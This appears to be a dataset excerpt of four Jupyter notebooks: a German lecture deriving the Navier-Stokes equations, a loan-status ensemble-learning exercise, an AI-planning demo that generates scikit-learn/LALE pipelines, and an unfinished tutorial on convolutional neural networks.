code
stringlengths 2.5k
150k
| kind
stringclasses 1
value |
|---|---|
## Die Navier-Stokes-Gleichungen
Die Navier-Stokes-Gleichungen sind die Grundgleichungen zur Berechnung reibungsbehafteter Strömungen. Obwohl mit dem Begriff im strengen Sinne nur die Impulsgleichung gemeint ist, wird damit in der numerischen Strömungsmechanik gleich der ganze Gleichungssatz aus Kontinuitäts-, Impuls- und Energiegleichung gemeint.
In diesem Abschnitt soll die aus der Strömungslehre bekannte Herleitung der Gleichungen kurz wiederholt werden. Wir wählen jedoch eine andere Herangehensweise und nutzen die zuvor eingeführte Substantielle Ableitung bzw. die Lagrangesche Betrachtungsweise.
Ziel ist es am Ende ein Gleichungssystem für den 2D-Fall zu erhalten.
### Kontinuitätsgleichung
Anhand der Kontinuitätsgleichung (Massenerhaltung) soll zunächst eine Herleitung mit Eulerscher Betrachtungsweise und anschließend mit Lagangrescher Betrachtung gezeigt werden.
#### Eulersche Betrachtungsweise:
Betrachten wir ein ortsfestes Kontrollvolumen, so entspricht die zeitliche Änderung der Masse im Volumenelement $\text{d}V$ gerade der Differenz zwischen ein- und ausströmendem Massenstrom.
Der ausströmende Massenstrom unterscheidet sich dabei gerade um die Änderung des Massenstroms über die Abmessung des Kontrollvolumens. Das folgende Bild zeigt das Kontrollvolumen und die ein- und austretenden Massenströme für den 1-D-Fall.
<img src="Konti.pdf" style="width: 400px;"/>
Wenn wir die Taylorreihe nach dem ersten Glied abbrechen ergibt sich für die Massenerhaltung (1D):
$$\frac{\partial \dot{m}}{\partial t} = \dot{m} - \left(\dot{m}+\frac{\partial \dot{m}}{\partial x}\text{d}x\right)$$
oder mit $\text{d}\dot{m} = \rho \text{d}\dot{V}$ und $\dot{m} = \rho v_x \text{d}y\text{d}z$:
$$\frac{\partial \rho}{\partial t} = - \frac{\partial \left(\rho v_x\right)}{\partial x}$$
Im 3D-Fall müssen noch die 4 Massenströme in $y$- und $z$-Richtung berücksichtigt werden, so dass folgende Gleichung für die Kontinuitätsgleichung resultiert:
<div class=highlight>
$$\frac{\partial \rho}{\partial t} = - \left[\frac{\partial (\rho v_x)}{\partial x} + \frac{\partial (\rho v_y)}{\partial y} + \frac{\partial (\rho v_z)}{\partial z}\right]$$
</div>
oder in alternativer Schreibweise:
<div class=highlight>
$$\frac{\partial \rho}{\partial t} + \frac{\partial (\rho v_i)}{\partial x_i} = 0 \quad \text{bzw.} \quad \frac{\partial \rho}{\partial t} + \text{div}(\rho \overrightarrow{v}) = 0 \quad \text{bzw.} \quad \frac{\partial \rho}{\partial t} + \nabla\cdot(\rho \overrightarrow{v}) = 0$$
</div>
#### Lagrangesche Betrachtungsweise:
Ein mitbewegter Beobachter, der sich mit der Geschwindigkeit $\overrightarrow{v}$ durch ein Strömungsgebiet unterschiedlicher Dichte bewegt, registriert die folgende Dichteänderung mit der Zeit:
$$\frac{\text{D}\rho}{\text{D} t} = \frac{\partial \rho}{\partial t} + \overrightarrow{v}\cdot\nabla \rho$$
Mithilfe der oben hergeleiteten Kontinuitätsgleichung in Eulerscher Betrachtungsweise können wir die partielle Ableitung der Dichte nach der Zeit ersetzen:
$$\frac{\text{D}\rho}{\text{D} t} = -\underbrace{\nabla\cdot(\rho \overrightarrow{v})}_{\text{Produktregel}\atop\text{anwenden}} + \overrightarrow{v}\cdot\nabla \rho$$
Durch Anwendung der Produktregel auf den ersten Term nach dem Gleichheitszeichen folgt:
$$\frac{\text{D}\rho}{\text{D} t} = -\left[\color{red}{\overrightarrow{v}\cdot\nabla \rho} + \rho\nabla\cdot\overrightarrow{v} \right] + \color{red}{\overrightarrow{v}\cdot\nabla \rho} = -\rho\nabla\cdot\overrightarrow{v} = -\rho \text{div}\overrightarrow{v}$$
Für **inkompressible Strömungen** ($\rho = const$) vereinfacht sich die Konti-Gleichung zu:
$$\text{div} \overrightarrow{v} = 0.$$
D.h. inkompressible Strömungen sind *quellen- und senkenfrei*. Da sich die Dichte im Strömungsgebiet nicht ändern kann, kann sich auch an keiner Stelle Masse ansammeln. Alles was in ein Kontrollvolumen hineinfließt muss auch wieder herausfließen.
### Impulsgleichung
Die Herleitung der Impulsgleichung soll ebenfalls in Eulerscher und Lagrangescher Betrachtungsweise erfolgen. Der Impuls ist ein Vektor und entspricht dem Prdukt aus Masse und Geschwindigkeitsvektor:
$$\overrightarrow{p} = m \overrightarrow{v} = \rho V \overrightarrow{v}$$
Die Änderung des Impulses pro Zeit entspricht einer Kraft:
$$\frac{\partial \overrightarrow{p}}{\partial t} = \overrightarrow{F}$$
#### Eulersche Betrachtung
Wir betrachten wieder ein im Raum fixiertes Kontrollvolumen. Da der Impuls ein Vektor ist, müssen wir für jede Raumrichtung eine Gleichung aufstellen (später werden wir diese drei Gleichungen zu einer Vektorgleichung zusammenfassen). Die Herleitung soll hier beispielhaft an der Gleichung für die $x$-Richtung erfolgen.
Die Änderung des $x$-Impulses im Kontrollvolumen entspricht der Summe der am Kontrollvolumen angreifenden Volumenkräfte (Gravitation, elektrische Felder, Magnetfelder) und der Oberflächenkräfte (Trägheitskräfte = ein-/austretende Impulsströme, Reibungskräfte, Druckkräfte):
$$\frac{\partial (\rho v_x)}{\partial t}\text{d}V = \scriptsize{ {{\text{Impulsströme}\atop\text{(Trägheitskräfte)}} + \text{Druckkräfte}} + \text{Reibungskräfte} + \text{Volumenkräfte}}$$
Die rechte Seite der Gleichung werden wir nun schrittweise aufstellen.
##### Impulsströme (Trägheitskräfte)
Durch alle sechs Seiten des Kontrollvolumens kann $x$-Impuls mit dem Volumenstrom transportiert werden. $x$-Impuls kann also auch in $y$- und $z$-Richtung mit der Strömung transportiert werden! Im folgenden Bild ist dies für 4 der Seiten dargestellt.
<img src="Impuls.pdf" style="width: 500px;"/>
Zusammengefasst ergibt sich für die Impulsströme (Trägheitskräfte):
$$\text{Impulsströme} = -\left[
\frac{\partial (\rho v_x v_x)}{\partial x}
+\frac{\partial (\rho v_x v_y)}{\partial y}
+\frac{\partial (\rho v_x v_z)}{\partial z}
\right]\text{d}x\text{d}y\text{d}z$$
##### Druckkräfte
Die Druckkräfte in $x$-Richtung wirken auf zwei Seitenflächen des Kontrollvolumens jeweils senkrecht auf die Fläche:
<img src="Druck.pdf" style="width: 500px;"/>
Zusammengefasst ergeben die Druckkräfte in $x$-Richtung:
$$\text{Druckkräfte} =
-\frac{\partial p}{\partial x} \text{d}x\text{d}y\text{d}z$$
##### Reibungskräfte
Die Reibungskräfte (Normal- und Schubkräfte) in $x$-Richtung greifen an allen 6-Seiten des Kontrollvolumens an:
<img src="Schub.pdf" style="width: 500px;"/>
Sie ergeben in Summe:
$$\text{Reibungskräfte} =
\left[
\frac{\partial \tau_{xx}}{\partial x} +
\frac{\partial \tau_{yx}}{\partial y} +
\frac{\partial \tau_{zx}}{\partial z}
\right]\text{d}x\text{d}y\text{d}z$$
##### Volumenkräfte
Die Volumenkräfte wirken homogen auf das gesamte Kontrollvolumen. Zu den wichtigsten zählt die Graviationskraft, die wir wie folgt in den Gleichungen berücksichtigen können:
$$\scriptsize{\text{Volumenkräfte}} = \rho\cdot g_x\text{d}x\text{d}y\text{d}z$$
##### alles zusammengefasst:
Alle Komponenten zusammenaddiert und durch das Kontrollvolumen $\text{d}V = \text{d}x\text{d}y\text{d}z$ geteilt ergeben die Impulsgleichung für die $x$-Richtung und analog dazu für die $y$- und $z$-Richtung:
$$\small{\frac{\partial (\rho v_x)}{\partial t}
+ \frac{\partial (\rho v_x v_x)}{\partial x}
+ \frac{\partial (\rho v_x v_y)}{\partial y}
+ \frac{\partial (\rho v_x v_z)}{\partial z}
=
- \frac{\partial p}{\partial x} + \rho g_x
+ \frac{\partial \tau_{xx}}{\partial x}
+ \frac{\partial \tau_{yx}}{\partial y}
+ \frac{\partial \tau_{zx}}{\partial z}}
$$
$$\small{\frac{\partial (\rho v_y)}{\partial t}
+ \frac{\partial (\rho v_y v_x)}{\partial x}
+ \frac{\partial (\rho v_y v_y)}{\partial y}
+ \frac{\partial (\rho v_y v_z)}{\partial z}
=
- \frac{\partial p}{\partial y} + \rho g_y
+ \frac{\partial \tau_{xy}}{\partial x}
+ \frac{\partial \tau_{yy}}{\partial y}
+ \frac{\partial \tau_{zy}}{\partial z}}
$$
$$\small{\frac{\partial (\rho v_z)}{\partial t}
+ \frac{\partial (\rho v_z v_x)}{\partial x}
+ \frac{\partial (\rho v_z v_y)}{\partial y}
+ \frac{\partial (\rho v_z v_z)}{\partial z}
=
- \frac{\partial p}{\partial z} + \rho g_z
+ \frac{\partial \tau_{xz}}{\partial x}
+ \frac{\partial \tau_{yz}}{\partial y}
+ \frac{\partial \tau_{zz}}{\partial z}}
$$
Die Navier-Stokes-Gleichungen findet man in verschiedenen Darstellung. Eine weitere soll hier gezeigt werden. Wir betrachten dazu nur die linke Seite der $x$-Impulsgleichung und wenden die Produktregel auf die Ableitungen an:
$$\small{\frac{\partial (\rho v_x)}{\partial t}
+ \frac{\partial (\rho v_x v_x)}{\partial x}
+ \frac{\partial (\rho v_x v_y)}{\partial y}
+ \frac{\partial (\rho v_x v_z)}{\partial z}
=
\color{red}{v_x\frac{\partial\rho}{\partial t}} + \rho\frac{\partial v_x}{\partial t} + \color{red}{v_x\frac{\partial(\rho v_x)}{\partial x}} + v_x\frac{\partial(\rho v_x)}{\partial x} + \color{red}{v_x\frac{\partial(\rho v_y)}{\partial y}} + v_y\frac{\partial(\rho v_x)}{\partial y} + \color{red}{v_x\frac{\partial(\rho v_z)}{\partial z}} + v_z\frac{\partial(\rho v_x)}{\partial z}}$$
Betrachten wir nur die rot markierten Terme, so wird klar, dass diese in Summe gerade der Kontinuitätsgleichung multipliziert mit $v_x$ und damit Null entsprechen.
Wir bekommen also als weitere, gleichwertige Darstellung für die Navier-Stokes-Gleichungen:
<div class=highlight>
$$\small{\rho\frac{\partial v_x}{\partial t} + v_x\frac{\partial(\rho v_x)}{\partial x} + v_y\frac{\partial(\rho v_x)}{\partial y} + v_z\frac{\partial(\rho v_x)}{\partial z}
=
- \frac{\partial p}{\partial x} + \rho g_x
+ \frac{\partial \tau_{xx}}{\partial x}
+ \frac{\partial \tau_{yx}}{\partial y}
+ \frac{\partial \tau_{zx}}{\partial z}
}$$
<BR>
$$\small{\rho\frac{\partial v_y}{\partial t} + v_x\frac{\partial(\rho v_y)}{\partial x} + v_y\frac{\partial(\rho v_y)}{\partial y} + v_z\frac{\partial(\rho v_y)}{\partial z}
=
- \frac{\partial p}{\partial x} + \rho g_y
+ \frac{\partial \tau_{xy}}{\partial x}
+ \frac{\partial \tau_{yy}}{\partial y}
+ \frac{\partial \tau_{zy}}{\partial z}
}$$
<BR>
$$\small{\underbrace{\vphantom{v_x\frac{\partial(\rho v_z)}{\partial x} + v_y\frac{\partial(\rho v_z)}{\partial y} + v_z\frac{\partial(\rho v_z)}{\partial z}}\rho\frac{\partial v_z}{\partial t}}_{\text{zeitl.}\atop\text{Änd.}} + \underbrace{v_x\frac{\partial(\rho v_z)}{\partial x} + v_y\frac{\partial(\rho v_z)}{\partial y} + v_z\frac{\partial(\rho v_z)}{\partial z}}_{\text{konvektiver Impulstransport}\atop\text{durch Strömung}}
=
\underbrace{\vphantom{+ \frac{\partial \tau_{xz}}{\partial x}
+ \frac{\partial \tau_{yz}}{\partial y}
+ \frac{\partial \tau_{zz}}{\partial z}}- \frac{\partial p}{\partial x} + \rho g_z}_{\text{Quell-}\atop\text{terme}}
\underbrace{+ \frac{\partial \tau_{xz}}{\partial x}
+ \frac{\partial \tau_{yz}}{\partial y}
+ \frac{\partial \tau_{zz}}{\partial z}}_{\text{diffusiver Transport}\atop\text{durch räuml. Impulsunterschiede}}}$$
</div>
Den einzelnen Termen der Impulsgleichung können zwei Transportmechanismen zugeordnet werden: den konvektiven Transport, der durch die Strömungsbewegung selbst zustandekommt und den diffusiven Transport, der aus einem räumlichen Gradienten der Transportgröße (hier der Impuls) resultiert (vgl. Ausbreitung eines Tintentropfens in einem Glas mit ruhender Flüssigkeit).
##### Modellierung der Normal- und Schubspannungen $\tau_{ij}$
Die Impulsgleichung in der obigen Form ist für beliebige Fluide gültig. Das Gleichungssystem aus den drei Impulsgleichungen und der Kontinuitätsgleichung enthält neben den uns interessierenden Unbekannten $v_x, v_y, v_z$ und $\rho$ auch noch den Druck $p$ sowie die 9 Normal- und Schubspannungen. Es ist so also noch nicht lösbar (nur 4 Gleichungen für 14 Unbekannte).
Bei bekannter Temperatur kann der Druck z.B. über das ideale Gasgesetz $p/\rho = R T$ berechnet werden. Für die 9 Spannungen benötigen wir noch eine Berechnungsvorschrift, die von der Art des Fluids abhängt. Für [Newtonsche Fluide](https://de.wikipedia.org/wiki/Newtonsches_Fluid) kann hierzu der *Newtonsche Schubspannungsansatz* verwendet werden:
<div class=highlight>
$$\tau_{ij} = \mu \left(\frac{\partial v_i}{\partial x_j} + \frac{\partial v_j}{\partial x_i} \right) + \delta_{ij}\lambda\nabla \overrightarrow{v}$$
</div>
Dieser besagt, dass die Schubspannungen proportional zu den Geschwindigkeitsgradienten (dem Verformungstensor) sind, wobei der Proportionalitätsfaktor gerade die [dynamische Viskosität](https://de.wikipedia.org/wiki/Viskosität) $\mu$ ist. Der letzte Term in der Gleichung berücksichtigt die sog. [Volumenviskosität](https://de.wikipedia.org/wiki/Volumenviskosität) $\lambda$. Diese ist im inkompressiblen Fall und bei 1-atomigen Gasen vernachlässigbar. Von Bedeutung ist sie dagegen bei verdünnten, mehratomigen Gasen (z.B. bei der Berechnung von Wiedereintrittsflugkörpern, etc.). Nach der Stokes-Hypothese (die jedoch nicht exakt ist) gilt: $\lambda+\frac{2}{3}\mu = 0$.
> Hinweis: Das Symbol $\delta_{ij}$ ist das aus der Mathematik bekannte [Kronecker-Delta](https://de.wikipedia.org/wiki/Kronecker-Delta). Es nimmt für $i=j$ den Wert 1 an und für $i\ne j$ den Wert 0. Es wird immer dann verwendet, wenn in Indexschreibweise nur die Einträge auf der Matrix-Diagonalen angesprochen werden sollen. In der Gleichung oben spielt die Volumenviskosität also nur bei den drei Normalspannungen $\tau_{11}, \tau_{22}$ und $\tau_{33}$ eine Rolle.
**Übung:** Schreiben Sie alle 9 Komponenten des Schubspannungstensors auf.
#### Lagrangesche Betrachtung
Die Herleitung der Navier-Stokes-Gleichungen unter Lagrangescher Betrachtungsweise ähnelt der der Molekulardynamiksimulation, nur dass wir jetzt keine einzelnen Teilchen betrachten, sondern ein Volumenelement, das sich mit der Strömung mitbewegt. Nach dem 2. Newtonschen Gesetz gilt:
*Masse mal Beschleunigung ist gleich Kraft*
auf das Kontrollvolumen $V_{KV}$ bezogen gilt also:
$$\frac{m\cdot a}{V_{KV}} = \frac{F}{V_{KV}}$$
oder
$$\rho \frac{\text{D}\overrightarrow{v}}{\text{D}t} = \text{Druckkräfte} + \text{Reibungskräfte} + \text{Volumenkräfte}$$
Im Gegensatz zur Herleitung in Eulerscher Betrachtungsweise fehlen die Impulsströme, da das Kontrollvolumen ja mit der Strömung mitbewegt wird und nichts hindurchströmt. Die Navier-Stokes-Gleichungen in dieser Form können sehr kompakt geschrieben werden:
$$\rho \frac{\text{D}\overrightarrow{v}}{\text{D}t} = \nabla \cdot \tau_{ij}^* + \rho\cdot\overrightarrow{g}$$
mit
$$\tau_{ij}^* = -p\cdot\delta_{ij} + \tau_{ij}$$
Um auf die Darstellung in Eulerscher Betrachtung zu kommen, muss nur die Substantielle Ableitung ausgeschrieben werden. Dann treten auch die konvektiven Terme wieder in Erscheinung:
$$\rho\cdot\left(\frac{\partial \overrightarrow{v}}{\partial t}+\overrightarrow{v}\cdot\nabla\overrightarrow{v} \right) = \nabla \cdot \tau_{ij}^* + \rho\cdot\overrightarrow{g}$$
**(Längere) Übung:** Schreiben Sie die Vektorgleichung auf und zeigen Sie, dass Sie mit dem Gleichungssystem aus der Eulerschen Betrachtungsweise übereinstimmt. Hinweis: Wenden Sie wieder die Produktregel auf die Ableitungen $\frac{\partial (\rho v_i)}{\partial x_j}$ an.
Damit haben wir das notwendige Gleichungssystem, um isotherme Strömungen zu berechnen. Für nicht isotherme Strömungen benötigen wir noch die Energiegleichung, die an anderer Stelle hergeleitet wird.
Im [nächsten Notebook](TFD - 3.3 Kontinuumsstroemungen - Navier-Stokes-Gleichungen-2D.ipynb) werden wir die Navier-Stokes-Gleichungen für 2-dimensionale, inkompressible Strömungen mit Newtonschen Fluiden vereinfachen und im weiteren Verlauf der Vorlesung mithilfe der Finite-Differenzen-Methode lösen.
---
###### Copyright (c) 2017, Matthias Stripf
Der folgende Python-Code darf ignoriert werden. Er dient nur dazu, die richtige Formatvorlage für die Jupyter-Notebooks zu laden.
```
from IPython.core.display import HTML
def css_styling():
styles = open('TFDStyle.css', 'r').read()
return HTML(styles)
css_styling()
```
|
github_jupyter
|
# Ensemble Learning
## Initial Imports
```
import warnings
warnings.filterwarnings('ignore')
import numpy as np
import pandas as pd
from pathlib import Path
from collections import Counter
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import balanced_accuracy_score
from sklearn.metrics import confusion_matrix, accuracy_score, classification_report
from imblearn.metrics import classification_report_imbalanced
from sklearn.ensemble import RandomForestClassifier
from imblearn.ensemble import BalancedRandomForestClassifier
from imblearn.ensemble import EasyEnsembleClassifier
```
## Read the CSV and Perform Basic Data Cleaning
```
# Load the data
file_path = Path('Resources/LoanStats_2019Q1.csv')
df = pd.read_csv(file_path)
# Preview the data
df.head()
```
## Split the Data into Training and Testing
```
# Create our features
y = df.loan_status
X = df.drop(columns='loan_status', axis=1)
# Create our target
df.select_dtypes(include='object').info()
X = pd.get_dummies(X, columns=['home_ownership', 'verification_status', 'issue_d', 'pymnt_plan', 'initial_list_status', 'next_pymnt_d', 'application_type', 'hardship_flag', 'debt_settlement_flag'])
# Check the balance of our target values
X.head()
y.value_counts()
# Split the X and y into X_train, X_test, y_train, y_test
X_train, X_test, y_train, y_test = train_test_split(X,
y,
random_state=1,
stratify=y
)
```
## Data Pre-Processing
Scale the training and testing data using the `StandardScaler` from `sklearn`. Remember that when scaling the data, you only scale the features data (`X_train` and `X_testing`).
```
# Create the StandardScaler instance
scaler = StandardScaler()
# Fit the Standard Scaler with the training data
# When fitting scaling functions, only train on the training dataset
X_scaler = scaler.fit(X_train)
# Scale the training and testing data
X_train_scaled = X_scaler.transform(X_train)
X_test_scaled = X_scaler.transform(X_test)
```
## Ensemble Learners
In this section, you will compare two ensemble algorithms to determine which algorithm results in the best performance. You will train a Balanced Random Forest Classifier and an Easy Ensemble classifier . For each algorithm, be sure to complete the folliowing steps:
1. Train the model using the training data.
2. Calculate the balanced accuracy score from sklearn.metrics.
3. Display the confusion matrix from sklearn.metrics.
4. Generate a classication report using the `imbalanced_classification_report` from imbalanced-learn.
5. For the Balanced Random Forest Classifier only, print the feature importance sorted in descending order (most important feature to least important) along with the feature score
Note: Use a random state of 1 for each algorithm to ensure consistency between tests
### Balanced Random Forest Classifier
```
# Resample the training data with the BalancedRandomForestClassifier
rf_model = RandomForestClassifier(n_estimators=100, random_state=1)
rf_model = rf_model.fit(X_train_scaled, y_train)
rf_predictions = rf_model.predict(X_test_scaled)
# Calculated the balanced accuracy score
acc_score = accuracy_score(y_test, rf_predictions)
cm_rf = confusion_matrix(y_test, rf_predictions)
cm_rf_df = pd.DataFrame(
cm_rf, index=['Actual 0', 'Actual 1'], columns=['predicted 0', 'predicted 1']
)
# Display the confusion matrix
print('Confusion Matrix')
display(cm_rf_df)
print(f'Accuracy Score : {acc_score}')
print('Classification Report')
print(classification_report(y_test, rf_predictions))
# Print the imbalanced classification report
print(classification_report_imbalanced(y_test, rf_predictions))
# List the features sorted in descending order by feature importance
importances = rf_model.feature_importances_
sorted(zip(rf_model.feature_importances_, X.columns), reverse=True)
#personal challenge: trying to put all top 10~ highest importance features in a df to vizualize
importances_df = pd.DataFrame(
(rf_model.feature_importances_, X.columns)
)
importances_df = importances_df.T
importances_df.columns = ['Importance', 'Feature']
importances_df = importances_df.sort_values(["Importance"], ascending=False).reset_index(drop=True)
importances_df.head()
importances_df.drop(index=importances_df.iloc[10:, :].index.tolist(), inplace=True)
importances_df
importances_df.set_index(('Feature'), inplace=True)
importances_df.plot(kind='barh', color='lightgreen', title= 'Features Importances', legend=False)
```
### Easy Ensemble Classifier
```
# Train the Classifier
eec_model = EasyEnsembleClassifier(n_estimators=100, random_state=1)
eec_model = eec_model.fit(X_train_scaled, y_train)
eec_y_predictions = eec_model.predict(X_test_scaled)
# Calculated the balanced accuracy score
balanced_accuracy_score(y_test, eec_y_predictions)
# Display the confusion matrix
confusion_matrix(y_test, eec_y_predictions)
# Print the imbalanced classification report
print(classification_report_imbalanced(y_test, eec_y_predictions, digits=4))
```
### Final Questions
1. Which model had the best balanced accuracy score?
Random Forrest Test
2. Which model had the best recall score?
Random Forrest Test of 1.0
3. Which model had the best geometric mean score?
Easy Ensemble Classifier of 0.9253
4. What are the top three features?
total_recovered_principle, total_payment, total_payment_inv
|
github_jupyter
|
# Using AI planning to explore data science pipelines
```
from __future__ import print_function
import sys
import os
import types
sys.path.append(os.path.abspath(os.path.join(os.getcwd(), "../grammar2lale")))
# Clean output directory where we store planning and result files
os.system('rm -rf ../output')
os.system('mkdir -p ../output')
```
## 1. Start with a Data Science grammar, in EBNF format
```
# This is the grammar file we will use
GRAMMAR_FILE="../grammar/dsgrammar-subset-sklearn.bnf"
# Copy grammar to the output directory
os.system("cp " + GRAMMAR_FILE + " ../output/")
!cat ../output/dsgrammar-subset-sklearn.bnf
```
## 2. Convert the grammar into an HTN domain and problem and use [HTN to PDDL](https://github.com/ronwalf/HTN-Translation) to translate to a PDDL task
```
from grammar2lale import Grammar2Lale
# Generate HTN specifications
G2L = Grammar2Lale(grammar_file=GRAMMAR_FILE)
with open("../output/domain.htn", "w") as f:
f.write(G2L.htn_domain);
with open("../output/problem.htn", "w") as f:
f.write(G2L.htn_problem);
from grammarDiagram import sklearn_diagram
with open('../output/grammar.svg', 'w') as f:
sklearn_diagram.writeSvg(f.write)
from IPython.core.display import SVG
SVG('../output/grammar.svg')
!cat ../output/domain.htn
!cat ../output/problem.htn
```
## 3. Extend the PDDL task by integrating soft constraints
```
import re
from ipywidgets import interact, interactive, fixed, interact_manual
import ipywidgets as widgets
# as a safety step, setting costs to 0 for any parts of the grammar that are non-identifiers (e.g., parens, etc.)
for token in G2L.htn.mapping:
if not re.match('^[_a-zA-Z]', str(token)):
G2L.costs[token] = 0
# prepare the list of possible constraints
constraint_options = G2L.get_selectable_constraints()
constraint_options.sort()
# prepare a constraint selection form
interact_pipeline_params=interact.options(manual=True, manual_name='Generate PDDL')
pipelines = []
NUM_PIPELINES = 10
CONSTRAINTS = []
# This is the function that handles the constraint selection
@interact_pipeline_params(num_pipelines=widgets.IntSlider(value=10, min=1, max=100),
constraints=widgets.SelectMultiple(options=constraint_options,
description='Search constraints',
rows=min(20, len(constraint_options))))
def select_pipeline_gen_params(num_pipelines, constraints):
global pipelines
global NUM_PIPELINES
global CONSTRAINTS
NUM_PIPELINES = num_pipelines
CONSTRAINTS = list(constraints)
G2L.create_pddl_task(NUM_PIPELINES, CONSTRAINTS)
with open("../output/domain.pddl", "w") as f:
f.write(G2L.last_task['domain'])
with open("../output/problem.pddl", "w") as f:
f.write(G2L.last_task['problem'])
!cat ../output/domain.pddl
!cat ../output/problem.pddl
```
## 4. Use a planner to solve the planning task (in this case, [K*](https://github.com/ctpelok77/kstar) )
```
import json
G2L.run_pddl_planner()
with open("../output/first_planner_call.json", "w") as f:
f.write(json.dumps(G2L.last_planner_object, indent=3))
!cat ../output/first_planner_call.json
```
## 5. Translate plans to [LALE](https://github.com/IBM/lale) Data Science pipelines
```
# Translate to pipelines
pipelines = G2L.translate_to_pipelines(NUM_PIPELINES)
from pipeline_optimizer import PipelineOptimizer
from sklearn.datasets import load_iris
from lale.helpers import to_graphviz
from lale.lib.sklearn import *
from lale.lib.lale import ConcatFeatures as Concat
from lale.lib.lale import NoOp
from lale.lib.sklearn import KNeighborsClassifier as KNN
from lale.lib.sklearn import OneHotEncoder as OneHotEnc
from lale.lib.sklearn import Nystroem
from lale.lib.sklearn import PCA
optimizer = PipelineOptimizer(load_iris(return_X_y=True))
# instantiate LALE objects from pipeline definitions
LALE_pipelines = [optimizer.to_lale_pipeline(p) for p in pipelines]
# Display selected pipeline
def show_pipeline(pipeline):
print("Displaying pipeline " + pipeline['id'] + ", with cost " + str(pipeline['score']))
print(pipeline['pipeline'])
print('==================================================================================')
print()
print()
print()
display(to_graphviz(pipeline['lale_pipeline']))
display_pipelines = [[p['pipeline'], p] for p in LALE_pipelines]
interact(show_pipeline, pipeline=display_pipelines)
!pip install 'liac-arff>=2.4.0'
```
## 6. Optimize one of the pipelines on a small dataset
```
from lale.lib.lale import Hyperopt
import lale.datasets.openml
from sklearn.datasets import load_iris
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
PIPELINE_IDX = 0
display(to_graphviz(LALE_pipelines[PIPELINE_IDX]['lale_pipeline']))
opt = Hyperopt(
estimator=LALE_pipelines[PIPELINE_IDX]['lale_pipeline'],
max_evals=20,
scoring='accuracy'
)
X, y = load_iris(return_X_y=True)
train_X, test_X, train_y, test_y = train_test_split(
X, y, test_size=0.2, stratify=y, random_state=5489
)
X
trained_pipeline = opt.fit(train_X, train_y)
predictions = trained_pipeline.predict(test_X)
best_accuracy = accuracy_score(test_y, [round(pred) for pred in predictions])
print('Best accuracy: ' + str(best_accuracy))
```
## 7. Train hyperparameters and evaluate the resulting LALE pipelines
```
trained_pipelines, dropped_pipelines = optimizer.evaluate_and_train_pipelines(pipelines)
from IPython.display import HTML
from tabulate import tabulate
from lale.pretty_print import to_string
def show_pipeline_accuracy(tp):
pipeline_table = [[to_string(p['trained_pipeline']).replace('\n', '<br/>'), str(p['best_accuracy'])] for p in tp]
display(HTML(tabulate(pipeline_table, headers=['Pipeline', 'Accuracy'], tablefmt='html')))
show_pipeline_accuracy(trained_pipelines)
```
## 8. Use pipeline accuracy to compute new PDDL action costs
```
feedback = optimizer.get_feedback(trained_pipelines)
G2L.feedback(feedback)
costs_table = [[str(k), G2L.costs[k]] for k in G2L.costs.keys()]
display(HTML(tabulate(costs_table, headers=['Pipeline element', 'Computed cost'], tablefmt='html')))
```
## 9. Invoke planner again on updated PDDL task and translate to pipelines
```
new_pipelines = G2L.get_plans(num_pipelines=NUM_PIPELINES, constraints=CONSTRAINTS)
with open('../output/domain_after_feedback.pddl', 'w') as f:
f.write(G2L.last_task['domain'])
with open('../output/problem_after_feedback.pddl', 'w') as f:
f.write(G2L.last_task['problem'])
with open('../output/second_planner_call.json', 'w') as f:
f.write(json.dumps(G2L.last_planner_object, indent=3))
def build_and_show_new_table():
new_pipeline_table = [[pipelines[idx]['pipeline'], new_pipelines[idx]['pipeline']] for idx in range(min(len(pipelines), len(new_pipelines)))]
display(HTML(tabulate(new_pipeline_table, headers=['First iteration', 'After feedback'], tablefmt='html')))
build_and_show_new_table()
!cat ../output/domain_after_feedback.pddl
!cat ../output/problem_after_feedback.pddl
```
|
github_jupyter
|
This Jupyter notebook details theoretically the architecture and the mechanism of the Convolutional Neural Network (ConvNet) step by step. Then, we implement the CNN code for multi-class classification task using pytorch. <br>
The notebook was implemented by <i>Nada Chaari</i>, PhD student at Istanbul Technical University (ITU). <br>
# Table of Contents:
1)Convolution layer
1-1) Input image
1-2) Filter
1-3) Output image
1-4) Multiple filters
1-5) One-layer of a convolutional neural network
2)Pooling layer
3)Fully connected layer
4)Softmax
5)Application of CNN using CIFAR dataset
5-1) Dataset
5-2) Load and normalize the CIFAR10 training and test datasets
5-3) Define a Convolutioanl Neural Network
5-4) Define a Loss function and optimizer
5-5) Train the CNN
5-6) Test the network on the test data
Sources used to build this Jupiter Notebook:
* https://towardsdatascience.com/understanding-images-with-skimage-python-b94d210afd23
* https://gombru.github.io/2018/05/23/cross_entropy_loss/
* https://medium.com/@toprak.mhmt/activation-functions-for-deep-learning-13d8b9b20e
* https://github.com/python-engineer/pytorchTutorial/blob/master/14_cnn.py
* https://medium.com/machine-learning-bites/deeplearning-series-convolutional-neural-networks-a9c2f2ee1524
* https://towardsdatascience.com/stochastic-gradient-descent-clearly-explained-53d239905d31
# CNN (ConvNet) definition
Convolutional Neural Network is a sequence of layers made up of neurons that have learnable weights and biases. Each neuron receives some inputs, performs a dot product and optionally follows it with a non-linearity. The whole network still expresses a single differentiable score function: from the raw image pixels on one end to class scores at the other. CNNs have a loss function (e.g. SVM/Softmax) on the last (fully-connected) layer.
* There are 3 types of layers to build the ConvNet architectures:
* Convolution (CONV)
* Pooling (POOL)
* Fully connected (FC)
# 1) Convolution layer
## 1-1) Input image
* Image with color has three channels: red, green and blue, which can be represented as three 2d-matrices stacked over each other (one for each color), each having pixel values in the range 0 to 255.
<img src='https://miro.medium.com/max/1400/1*icINeO4H7UKe3NlU1fXqlA.jpeg' width='400' align="center">
## 1-2) Filter
<img src='https://miro.medium.com/max/933/1*7S266Kq-UCExS25iX_I_AQ.png' width='500' align="center">
* In the filter the value '1' allows filtering brightness,
* While '-1' highlights the darkness,
* Furthermore, '0' highlights the grey.
* The convolution layer in the case of a ConvNet extracts features from the input image:
* choose a filter (kernel) of a certain dimension
* slide the filter from the top left to the right until we reach the bottom of the image.
* The convolution operation is an element-wise multiplication between the two matrices (filter and the part of the image) and an addition of the multiplication outputs.
* The final integer of this computation forms a single element of the output matrix.
* Stride: is the step that the filter moves horizontally and vertically by pixel.
In the above example, the value of a stride equal to 1.
Because the pixels on the edges are “touched” less by the filter than the pixels within the image, we apply padding.
* Padding: is to pad the image with zeros all around its border to allow the filter to slide on top and maintain the output size equal to the input
